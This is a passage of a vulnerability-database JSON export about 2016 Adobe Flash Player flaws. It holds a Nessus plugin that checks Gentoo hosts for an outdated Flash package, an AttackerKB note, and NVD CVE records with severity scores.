"AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-14T00:00:00", "title": "GLSA-201603-07 : Adobe Flash Player: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0993", "CVE-2016-0992", "CVE-2016-1000", "CVE-2016-0996", "CVE-2016-0982", "CVE-2016-0984", "CVE-2016-0979", "CVE-2016-0967", "CVE-2016-0987", "CVE-2016-0997", "CVE-2016-0963", "CVE-2016-0962", "CVE-2016-1002", "CVE-2016-0994", "CVE-2016-0998", "CVE-2016-0970", "CVE-2016-0972", "CVE-2016-0990", "CVE-2016-0969", "CVE-2016-0999", "CVE-2016-0980", "CVE-2016-0974", "CVE-2016-0973", "CVE-2016-0960", "CVE-2016-0986", "CVE-2016-0966", "CVE-2016-1001", "CVE-2016-0971", "CVE-2016-0978", "CVE-2016-0965", "CVE-2016-0975", "CVE-2016-0995", "CVE-2016-0983", "CVE-2016-0964", "CVE-2016-0968", "CVE-2016-0976", "CVE-2016-0981", "CVE-2016-1005", "CVE-2016-0988", "CVE-2016-0977", "CVE-2016-0961", "CVE-2016-1010", "CVE-2016-0989", "CVE-2016-0985", "CVE-2016-0991"], "modified": "2016-03-14T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:adobe-flash"], "id": "GENTOO_GLSA-201603-07.NASL", "href": "https://www.tenable.com/plugins/nessus/89900", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201603-07.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89900);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-0960\", \"CVE-2016-0961\", \"CVE-2016-0962\", \"CVE-2016-0963\", \"CVE-2016-0964\", \"CVE-2016-0965\", \"CVE-2016-0966\", \"CVE-2016-0967\", \"CVE-2016-0968\", \"CVE-2016-0969\", \"CVE-2016-0970\", \"CVE-2016-0971\", \"CVE-2016-0972\", \"CVE-2016-0973\", \"CVE-2016-0974\", \"CVE-2016-0975\", \"CVE-2016-0976\", \"CVE-2016-0977\", \"CVE-2016-0978\", \"CVE-2016-0979\", \"CVE-2016-0980\", \"CVE-2016-0981\", \"CVE-2016-0982\", \"CVE-2016-0983\", \"CVE-2016-0984\", \"CVE-2016-0985\", \"CVE-2016-0986\", \"CVE-2016-0987\", \"CVE-2016-0988\", \"CVE-2016-0989\", \"CVE-2016-0990\", \"CVE-2016-0991\", \"CVE-2016-0992\", \"CVE-2016-0993\", \"CVE-2016-0994\", \"CVE-2016-0995\", \"CVE-2016-0996\", \"CVE-2016-0997\", \"CVE-2016-0998\", \"CVE-2016-0999\", \"CVE-2016-1000\", \"CVE-2016-1001\", \"CVE-2016-1002\", \"CVE-2016-1005\", \"CVE-2016-1010\");\n script_xref(name:\"GLSA\", value:\"201603-07\");\n\n script_name(english:\"GLSA-201603-07 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201603-07\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, cause a Denial of Service condition, obtain\n sensitive information, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201603-07\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose 'www-plugins/adobe-flash-11.2.202.577'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/14\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.577\"), vulnerable:make_list(\"lt 11.2.202.577\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2020-11-22T06:09:27", "bulletinFamily": "info", "cvelist": ["CVE-2016-0973", "CVE-2016-0974", "CVE-2016-0975", "CVE-2016-0982", "CVE-2016-0983", "CVE-2016-0984"], "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK &amp; Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0973, CVE-2016-0974, CVE-2016-0975, CVE-2016-0982, and CVE-2016-0983.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:13am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-02-10T00:00:00", "id": "AKB:EE2653E1-CBE1-4AF3-A198-B66C88A65136", "href": "https://attackerkb.com/topics/HN4pBHqbvW/cve-2016-0984", "type": "attackerkb", "title": "CVE-2016-0984", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0969", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0969"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0969", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0969", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0970", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0970"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0970", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0970", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Use-after-free vulnerability in Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2016-0973, CVE-2016-0975, CVE-2016-0982, CVE-2016-0983, and CVE-2016-0984.\n<a href=\"http://cwe.mitre.org/data/definitions/416.html\">CWE-416: Use After Free</a>", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0974", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0974"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0974", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0974", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:00", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0964", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0964"], "modified": "2017-09-10T01:29:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0964", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0964", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0968, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0979", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0979"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0979", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0979", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.207:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.185:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.226:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.559:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:19.0.0.245:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air:20.0.0.233:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.286:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:20.0.0.228:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:28:01", "description": "Adobe Flash Player before 18.0.0.329 and 19.x and 20.x before 20.0.0.306 on Windows and OS X and before 11.2.202.569 on Linux, Adobe AIR before 20.0.0.260, Adobe AIR SDK before 20.0.0.260, and Adobe AIR SDK & Compiler before 20.0.0.260 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2016-0964, CVE-2016-0965, CVE-2016-0966, CVE-2016-0967, CVE-2016-0969, CVE-2016-0970, CVE-2016-0972, CVE-2016-0976, CVE-2016-0977, CVE-2016-0978, CVE-2016-0979, CVE-2016-0980, and CVE-2016-0981.", "edition": 6, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-10T20:59:00", "title": "CVE-2016-0968", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0968"], "modified": "2016-12-06T03:06:00", "cpe": ["cpe:/a:adobe:flash_player:20.0.0.286", "cpe:/a:adobe:flash_player:20.0.0.228", "cpe:/a:adobe:flash_player:19.0.0.207", "cpe:/a:adobe:flash_player:11.2.202.559", "cpe:/a:adobe:air:20.0.0.233", "cpe:/a:adobe:flash_player:20.0.0.235", "cpe:/a:adobe:air_sdk:20.0.0.233", "cpe:/a:adobe:air_sdk_\\\\\\&_compiler:20.0.0.233", "cpe:/a:adobe:flash_player:18.0.0.326", "cpe:/a:adobe:flash_player:19.0.0.226", "cpe:/a:adobe:flash_player:19.0.0.245", "cpe:/a:adobe:flash_player:19.0.0.185"], "id": "CVE-2016-0968", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0968", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:18.0.0.326:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:air_sdk:20.0.0.233:*:*:*:*:*:*:*", 